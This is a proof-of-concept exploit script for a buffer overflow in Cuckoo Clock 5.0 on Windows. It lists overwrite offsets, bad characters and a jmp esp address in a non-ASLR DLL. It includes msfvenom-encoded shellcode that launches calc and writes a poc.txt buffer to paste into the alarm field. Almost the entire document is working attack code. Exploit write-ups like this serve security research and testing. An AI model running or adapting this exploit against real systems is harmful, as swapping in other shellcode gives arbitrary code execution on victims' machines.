# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute

# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes (immediately after the 4-byte EIP overwrite at 260)
# EBP overwrite at 256 bytes

# badChars = '\x00\x0d'  (NUL and carriage return must not appear anywhere in the pasted buffer; msfvenom is told to avoid the same two bytes below)

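# Offsets measured in the 'New Alarm' text box (see header comments):
# EBP is overwritten at 256 bytes, EIP at 260, ESP lands on the byte right
# after the saved EIP (264), and at most 1287 bytes fit in the field.
EBP_OFFSET = 256
MAX_BUFFER = 1287

# Bytes that must not appear anywhere in the buffer: NUL and carriage return.
# The msfvenom command below was given the same two bytes to avoid.
BAD_CHARS = b"\x00\x0d"

# 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
# ASLR: False, Rebase: False, SafeSEH: False
# (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
# The module is neither ASLR'd nor rebased, so the address is stable across
# runs, but it is tied to the CERBERUS.dll shipped with this version.
# Written little-endian so it lands in EIP as 0x10030516.
JMP_ESP = b"\x16\x05\x03\x10"

# mov ebp,esp ; sub esp,byte +0x30
# Lowers ESP by 0x30 before the encoded payload runs; presumably so the
# pushes made by the shikata_ga_nai decoder stub do not land on top of the
# shellcode it is still decoding in place -- the original notes give no reason.
FIX_STACK = b"\x89\xe5" + b"\x83\xec\x30"

# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
# x86/shikata_ga_nai chosen with final size 216
SHELLCODE = b""
SHELLCODE += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
SHELLCODE += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
SHELLCODE += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
SHELLCODE += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
SHELLCODE += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
SHELLCODE += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
SHELLCODE += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
SHELLCODE += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
SHELLCODE += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
SHELLCODE += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
SHELLCODE += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
SHELLCODE += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
SHELLCODE += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
SHELLCODE += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
SHELLCODE += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
SHELLCODE += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
SHELLCODE += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
SHELLCODE += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
SHELLCODE += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
SHELLCODE += b"\xa9\x70\x67\x0f\x39\x18\x68"


def build_payload(shellcode=SHELLCODE, eip=JMP_ESP, length=MAX_BUFFER):
    """Return the ``length``-byte buffer to paste into the 'New Alarm' box.

    Layout: 256 x 'A' up to the saved EBP, 'BBBB' over EBP, ``eip`` over the
    return address, the stack-adjust stub, ``shellcode``, then 'F' padding so
    the buffer always has the full ``length``.

    Everything is handled as ``bytes``: the original mixed ``str`` and
    ``bytes`` pieces, which only worked on Python 2.

    Raises ValueError if the pieces do not fit in ``length`` (the original
    silently emitted a short buffer instead) or if any byte in BAD_CHARS is
    present in the result.
    """
    head = (b"\x41" * EBP_OFFSET
            + b"\x42\x42\x42\x42"
            + eip
            + FIX_STACK
            + shellcode)
    if len(head) > length:
        raise ValueError("payload is %d bytes but only %d fit in the field"
                         % (len(head), length))
    payload = head + b"\x46" * (length - len(head))
    # Slicing rather than indexing keeps this correct on both Python 2 and 3.
    found = [BAD_CHARS[i:i + 1] for i in range(len(BAD_CHARS))
             if BAD_CHARS[i:i + 1] in payload]
    if found:
        raise ValueError("bad character(s) present in payload: %r" % (found,))
    return payload


def main(path="poc.txt"):
    """Write the buffer to ``path`` and report the outcome.

    The file is opened in binary mode: the encoded shellcode contains 0x0a,
    and text mode on Windows would rewrite it as CR LF, injecting the 0x0d
    bad character. Exits with status 1 if the file cannot be written or the
    payload fails its own checks.
    """
    try:
        with open(path, "wb") as fh:
            fh.write(build_payload())
    except (IOError, OSError, ValueError) as exc:
        print(path + " failed to create: " + str(exc))
        raise SystemExit(1)
    print(path + " created successfully")


if __name__ == "__main__":
    main()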